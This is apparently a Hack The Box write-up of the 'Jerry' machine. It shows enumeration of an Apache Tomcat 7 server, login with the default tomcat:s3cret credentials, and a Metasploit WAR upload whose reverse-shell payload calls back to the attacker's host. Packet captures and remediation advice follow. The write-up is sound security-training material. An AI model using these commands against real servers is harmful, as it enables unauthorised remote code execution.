Hack The Box - Jerry Writeup cover image

Hack The Box - Jerry Writeup

Antonette Caldwell • October 29, 2021

retired easy windows arbitrary file upload file misconfigurations

Machine: Jerry

Summary

This write-up has been updated on February 17, 2022.

Achievement: October 17, 2021

Jerry is a Windows machine with an Apache Tomcat server setup. As I go through the steps, you will see that the server is vulnerable to arbitrary file upload, which can lead to Command Injection, XSS attacks, Denial of Service attacks, and Remote Code Execution.

  1. Pre-engagement Intereactions (not applicable)
  2. Intelligence Gathering
    • Internal Footprinting
      • NMap scan completed

There is an open port 8080 which also list the service http-proxy.

nmap 10.10.10.95 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-16 20:55 GMT
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.062s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 9.20 seconds

We can also take a look to see what type of OS and service is behind the port 8080.

sudo nmap -A -O -Pn jerry.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-16 20:58 GMT
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.061s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|7|2008|2016|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2016 (85%), Microsoft Windows 7 Professional or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   64.06 ms 10.10.14.1
2   64.18 ms jerry.htb (10.10.10.95)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.65 seconds

You can also check the website by using a browser or use curl.

curl -v http://jerry.htb:8080
*   Trying 10.10.10.95:8080...
* Connected to jerry.htb (10.10.10.95) port 8080 (#0)
> GET / HTTP/1.1
> Host: jerry.htb:8080
> User-Agent: curl/7.74.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
< Content-Type: text/html;charset=ISO-8859-1
< Transfer-Encoding: chunked
< Date: Thu, 17 Feb 2022 04:04:24 GMT
<
  1. Threat Modeling (not applicable)
  2. Vulnerability Analysis
    • Vulnerability Testing
    • Vulnerability Scanning
      • Web Application Scanner tool - dirsearch
    • Vulnerability Validation
      • Check for default credentials

So far, after doing some scanning to check to make sure there aren't any other ports opened, I went ahead and selected a tool to scan the website. I will use a couple of different tools to illustrate the differences in the tools, but also letting you know that there are several ways to enumerate and to scan the website for vulnerabilities. I checked out the website to see anything of interest.

Apache Tomcat/7.0.88

Apache Tomcat is configured with several features, Server Status, Manager App, and Host Manager. Normally when you configure the Apache Tomcat server, the Server Status, Manager App and Host Manager should be configured an account/role to access the services. If there are not any, then a generic login could work.

Here is an example of a wordlist that have generic logins.

dirsearch -u http://jerry.htb:8080/

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10877

Output File: /home/user/.dirsearch/reports/jerry.htb/_22-02-16_21-35-59.txt

Error Log: /home/user/.dirsearch/logs/errors-22-02-16_21-35-59.log

Target: http://jerry.htb:8080/

[21:35:59] Starting: 
[21:36:08] 400 -    0B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[21:36:08] 400 -    0B  - /a%5c.aspx
[21:36:18] 302 -    0B  - /docs  ->  /docs/
[21:36:18] 200 -   19KB - /docs/
[21:36:19] 302 -    0B  - /examples  ->  /examples/
[21:36:19] 200 -    1KB - /examples/
[21:36:19] 200 -    7KB - /examples/servlets/index.html
[21:36:19] 200 -  928B  - /examples/servlets/servlet/RequestHeaderExample
[21:36:19] 200 -  637B  - /examples/servlets/servlet/CookieExample
[21:36:19] 200 -  716B  - /examples/jsp/snp/snoop.jsp
[21:36:19] 200 -   21KB - /favicon.ico
[21:36:21] 401 -    2KB - /host-manager/html
[21:36:21] 302 -    0B  - /host-manager/  ->  /host-manager/html
[21:36:22] 200 -   11KB - /index.jsp
[21:36:24] 302 -    0B  - /manager  ->  /manager/
[21:36:24] 401 -    2KB - /manager/status/all
[21:36:24] 401 -    2KB - /manager/html
[21:36:24] 401 -    2KB - /manager/html/
[21:36:24] 302 -    0B  - /manager/  ->  /manager/html

Task Completed

I reran dirsearch with different options and recursively. There were a lot that returned, but I snipped the returned results for brevity.

dirsearch -u http://jerry.htb:8080/ -e html,js,jsp -r

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: html, js, jsp | HTTP method: GET | Threads: 30 | Wordlist size: 9926

Output File: /home/user/.dirsearch/reports/jerry.htb/_22-02-16_21-37-04.txt

Error Log: /home/user/.dirsearch/logs/errors-22-02-16_21-37-04.log

Target: http://jerry.htb:8080/

[21:37:05] Starting: 
[21:37:12] 400 -    0B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[21:37:13] 400 -    0B  - /a%5c.aspx
[21:37:21] 200 -   19KB - /docs/     (Added to queue)
[21:37:21] 302 -    0B  - /docs  ->  /docs/
[21:37:21] 302 -    0B  - /examples  ->  /examples/     (Added to queue)
[21:37:21] 200 -    1KB - /examples/
[21:37:21] 200 -  716B  - /examples/jsp/snp/snoop.jsp
[21:37:21] 200 -    7KB - /examples/servlets/index.html
[21:37:21] 200 -  928B  - /examples/servlets/servlet/RequestHeaderExample
[21:37:21] 200 -  637B  - /examples/servlets/servlet/CookieExample
[21:37:21] 200 -   21KB - /favicon.ico
[21:37:22] 302 -    0B  - /host-manager/  ->  /host-manager/html
[21:37:22] 401 -    2KB - /host-manager/html
[21:37:23] 200 -   11KB - /index.jsp
[21:37:25] 302 -    0B  - /manager  ->  /manager/     (Added to queue)
[21:37:25] 302 -    0B  - /manager/  ->  /manager/html
[21:37:25] 401 -    2KB - /manager/html
[21:37:25] 401 -    2KB - /manager/html/     (Added to queue)
[21:37:25] 401 -    2KB - /manager/status/all
--snippet--
[21:42:47] Starting: manager/..;/
[21:42:56] 400 -    0B  - /manager/..;/\..\..\..\..\..\..\..\..\..\etc\passwd
[21:42:57] 400 -    0B  - /manager/..;/a%5c.aspx
[21:43:04] 302 -    0B  - /manager/..;/docs  ->  /docs/
[21:43:04] 200 -   19KB - /manager/..;/docs/     (Added to queue)
[21:43:05] 302 -    0B  - /manager/..;/examples  ->  /examples/
[21:43:05] 200 -    1KB - /manager/..;/examples/     (Added to queue)
[21:43:05] 200 -  728B  - /manager/..;/examples/jsp/snp/snoop.jsp
[21:43:05] 200 -    7KB - /manager/..;/examples/servlets/index.html
[21:43:05] 200 -  637B  - /manager/..;/examples/servlets/servlet/CookieExample
[21:43:05] 200 -  928B  - /manager/..;/examples/servlets/servlet/RequestHeaderExample
[21:43:05] 200 -   21KB - /manager/..;/favicon.ico
[21:43:06] 302 -    0B  - /manager/..;/host-manager/  ->  /manager/..;/host-manager/html
[21:43:06] 401 -    2KB - /manager/..;/host-manager/html
[21:43:07] 200 -   11KB - /manager/..;/index.jsp
[21:43:09] 302 -    0B  - /manager/..;/manager  ->  /manager/
[21:43:09] 401 -    2KB - /manager/..;/manager/html
[21:43:09] 302 -    0B  - /manager/..;/manager/  ->  /manager/html
[21:43:09] 401 -    2KB - /manager/..;/manager/status/all
[21:43:09] 401 -    2KB - /manager/..;/manager/html/     (Added to queue)
[21:43:17] Starting: manager/html/cgi-bin/
[21:43:29] 400 -    0B  - /manager/html/cgi-bin/\..\..\..\..\..\..\..\..\..\etc\passwd
[21:43:30] 400 -    0B  - /manager/html/cgi-bin/a%5c.aspx
[21:43:56] Starting: manager/images/
[21:43:58] 302 -    0B  - /manager/images/..;/  ->  /manager/html
[21:44:04] 400 -    0B  - /manager/images/\..\..\..\..\..\..\..\..\..\etc\passwd
[21:44:04] 400 -    0B  - /manager/images/a%5c.aspx
[21:44:10] 401 -    2KB - /manager/images/console/j_security_check
[21:44:14] 401 -    2KB - /manager/images/j_security_check
[21:44:24] Starting: manager/status/
[21:44:29] 404 -    2KB - /manager/status/%2e%2e//google.com
[21:44:29] 404 -    2KB - /manager/status/%2e%2e;/test
[21:44:29] 302 -    0B  - /manager/status/..;/  ->  /manager/html
[21:44:37] 400 -    0B  - /manager/status/\..\..\..\..\..\..\..\..\..\etc\passwd
[21:44:38] 400 -    0B  - /manager/status/a%5c.aspx

There seems to be a vulnerabiltiy on the server, for example: http://jerry.htb:8080/manager/..;/. The ..; was showing up multiple times on the other pages, but the Manager App is the one we want to get to. For more information on how Apache Tomcat is setup, you can check out the Apache Tomcat website on how to setup the server. The next step would be access the server by either bypassing the login or guessing the login.

Apache Tomcat has a generic login credentials tomcat:s3cret.

  1. Exploitation

Here was the error message that returned from attempting to login via Manager App.

401 Unauthorized

You are not authorized to view this page. If you have not changed any configuration files, please examine the file conf/tomcat-users.xml in your installation. That file must contain the credentials to let you use this webapp.

For example, to add the manager-gui role to a user named tomcat with a password of s3cret, add the following to the config file listed above.

<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>

Note that for Tomcat 7 onwards, the roles required to use the manager application were changed from the single manager role to the following four roles. You will need to assign the role(s) required for the functionality you wish to access.

    manager-gui - allows access to the HTML GUI and the status pages
    manager-script - allows access to the text interface and the status pages
    manager-jmx - allows access to the JMX proxy and the status pages
    manager-status - allows access to the status pages only

The HTML interface is protected against CSRF but the text and JMX interfaces are not. To maintain the CSRF protection:

    Users with the manager-gui role should not be granted either the manager-script or manager-jmx roles.
    If the text or jmx interfaces are accessed through a browser (e.g. for testing since these interfaces are intended for tools not humans) then the browser must be closed afterwards to terminate the session.

For more information - please see the Manager App HOW-TO.

You can either use Metasploit to guess the Apache Tomcat login for the Manager App, or try it out yourself. I didn't lookup the details on the Apache Tomcat website so I missed the first time around on what the next step to do. I attemped a couple of login credentials and it didn't fail, the login box returned multiple times. So I tried without logging in, and received a 403 not authorized page. Once there, I realized that I can just use tomcat:s3cret which I was able to login.

One of the features that Apache Tomcat has is the ability to upload WAR to the server. For this step, I am using Metasploit to complete the step.

Resources:

msf6 > use exploit/multi/http/tomcat_mgr_upload 
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 10.10.10.95
RHOSTS => 10.10.10.95
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
HttpPassword => s3cret
msf6 exploit(multi/http/tomcat_mgr_upload) > set payload java/shell_reverse_tcp
payload => java/shell_reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST 10.10.14.7
LHOST => 10.10.14.7
msf6 exploit(multi/http/tomcat_mgr_upload) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 10.10.14.7:1234 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying Uk679N1wprmWnWn38mnqDmmY...
[*] Executing Uk679N1wprmWnWn38mnqDmmY...
[*] Undeploying Uk679N1wprmWnWn38mnqDmmY ...
[*] Undeployed at /manager/html/undeploy
[*] Command shell session 1 opened (10.10.14.7:1234 -> 10.10.10.95:49192 ) at 2022-02-16 22:32:00 +0000


Shell Banner:
Microsoft Windows [Version 6.3.9600]
-----


C:\apache-tomcat-7.0.88>
  1. Post Exploitation

Obtained the flags for both user and root.

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
--snippet--

root.txt
--snippet--
C:\Users\Administrator\Desktop\flags>
  1. Reporting

There were several things that stood out to me. Since this server was vulnerable to arbitrary file upload, it is the fact that the server was setup with a generic login/role with tomcat:s3cret. It is highly suggested to create your own user/role and generate a secure password, and make sure that the password is not known to anyone. You could use a secrets management service for this, depending on your infrastructure.

Metasploit has a module where it targets Apache Tomcat server with Manager App that has the generic login tomcat:s3cret and also able to upload a payload which is a war file with a reverse shell. Once this was implemented, I was able to get a shell on the server, and obtain the necessary flags.

I also used Wireshark to watch the packet traffic ocurring while I used the Metasploit module. Here is the traffic below with just the HTTP traffic.

tshark -r metasploit-upload.pcapng | grep HTTP
    4 0.072700178   10.10.14.7 → 10.10.10.95  HTTP 201 GET /manager/html HTTP/1.1 
    5 0.135688417  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 401 Unauthorized  [TCP segment of a reassembled PDU]
    9 0.135753492  10.10.10.95 → 10.10.14.7   HTTP 325 HTTP/1.1 401 Unauthorized  (text/html)
   18 0.197749842   10.10.14.7 → 10.10.10.95  HTTP 244 GET /manager/html HTTP/1.1 
   19 0.269562111  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   21 0.269675408  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   23 0.269727846  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   25 0.269776160  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   27 0.325929368  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   29 0.326037310  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   31 0.332547557  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   33 0.332665095  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   35 0.332712724  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   37 0.332756704  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   39 0.332801443  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   41 0.332846707  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   43 0.382272592  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   45 0.382373463  10.10.10.95 → 10.10.14.7   HTTP 862 HTTP/1.1 200 OK  (text/html)
   50 0.453816006   10.10.14.7 → 10.10.10.95  TCP 1325 POST /manager/html/upload?path=6HQaGcvmG&org.apache.catalina.filters.CSRF_NONCE=BC58CA14023AC9145CCEF803D866C9C9 HTTP/1.1  [TCP segment of a reassembled PDU]
   63 0.517718037   10.10.14.7 → 10.10.10.95  HTTP 747 POST /manager/html/upload?path=6HQaGcvmG&org.apache.catalina.filters.CSRF_NONCE=BC58CA14023AC9145CCEF803D866C9C9 HTTP/1.1 
   64 0.522257125  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 401 Unauthorized  [TCP segment of a reassembled PDU]
   68 0.522418411  10.10.10.95 → 10.10.14.7   HTTP 261 HTTP/1.1 401 Unauthorized  (text/html)
   80 0.584331352   10.10.14.7 → 10.10.10.95  TCP 1325 POST /manager/html/upload?path=6HQaGcvmG&org.apache.catalina.filters.CSRF_NONCE=BC58CA14023AC9145CCEF803D866C9C9 HTTP/1.1  [TCP segment of a reassembled PDU]
   95 0.693843233   10.10.14.7 → 10.10.10.95  HTTP 790 POST /manager/html/upload?path=6HQaGcvmG&org.apache.catalina.filters.CSRF_NONCE=BC58CA14023AC9145CCEF803D866C9C9 HTTP/1.1 
   99 0.956742771  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  101 0.956800426  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  103 0.956822590  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  105 0.956842795  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  107 1.021571147  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  109 1.021666014  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  111 1.021693043  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  113 1.021717117  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  115 1.022575004  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  117 1.022642553  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  119 1.022661776  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  121 1.022680616  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  123 1.076915044  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  125 1.076982303  10.10.10.95 → 10.10.14.7   HTTP 1321 HTTP/1.1 200 OK  (text/html)
  134 1.255338945   10.10.14.7 → 10.10.10.95  HTTP 234 GET /6HQaGcvmG/BcG7baXoq31EqfXIq0oI9d5rvFB73LZ.jsp HTTP/1.1 
  135 1.320526520  10.10.10.95 → 10.10.14.7   HTTP 154 HTTP/1.1 200 OK 
  147 1.381513312   10.10.14.7 → 10.10.10.95  HTTP 201 GET /manager/html HTTP/1.1 
  150 1.444527646  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 401 Unauthorized  [TCP segment of a reassembled PDU]
  154 1.444590638  10.10.10.95 → 10.10.14.7   HTTP 325 HTTP/1.1 401 Unauthorized  (text/html)
  166 1.532002685   10.10.14.7 → 10.10.10.95  HTTP 244 GET /manager/html HTTP/1.1 
  171 1.606737194  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  173 1.606788963  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  175 1.606806190  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  177 1.607149734  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  179 1.664635737  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  181 1.664747433  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  183 1.664799377  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  185 1.664846724  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  187 1.664891883  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  189 1.664935716  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  191 1.671907371  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  193 1.672036840  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  195 1.720850260  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  197 1.720977321  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  199 1.721030291  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  201 1.721066724  10.10.10.95 → 10.10.14.7   HTTP 247 HTTP/1.1 200 OK  (text/html)
  206 1.787931364   10.10.14.7 → 10.10.10.95  HTTP 421 POST /manager/html/undeploy?path=/6HQaGcvmG&org.apache.catalina.filters.CSRF_NONCE=B326C53FAFD9721283DD6ECA7D42263A HTTP/1.1 
  207 1.851322502  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 401 Unauthorized  [TCP segment of a reassembled PDU]
  211 1.851601810  10.10.10.95 → 10.10.14.7   HTTP 261 HTTP/1.1 401 Unauthorized  (text/html)
  220 1.913337705   10.10.14.7 → 10.10.10.95  HTTP 464 POST /manager/html/undeploy?path=/6HQaGcvmG&org.apache.catalina.filters.CSRF_NONCE=B326C53FAFD9721283DD6ECA7D42263A HTTP/1.1 
  222 2.595876649  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  224 2.595946695  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  226 2.595961324  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  228 2.595973168  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  230 2.650887246  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  232 2.650959017  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  234 2.650971562  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  236 2.650982343  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  238 2.656114925  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  240 2.656154410  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  242 2.656166248  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  244 2.656176872  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  246 2.707231594  10.10.10.95 → 10.10.14.7   HTTP 930 HTTP/1.1 200 OK  (text/html)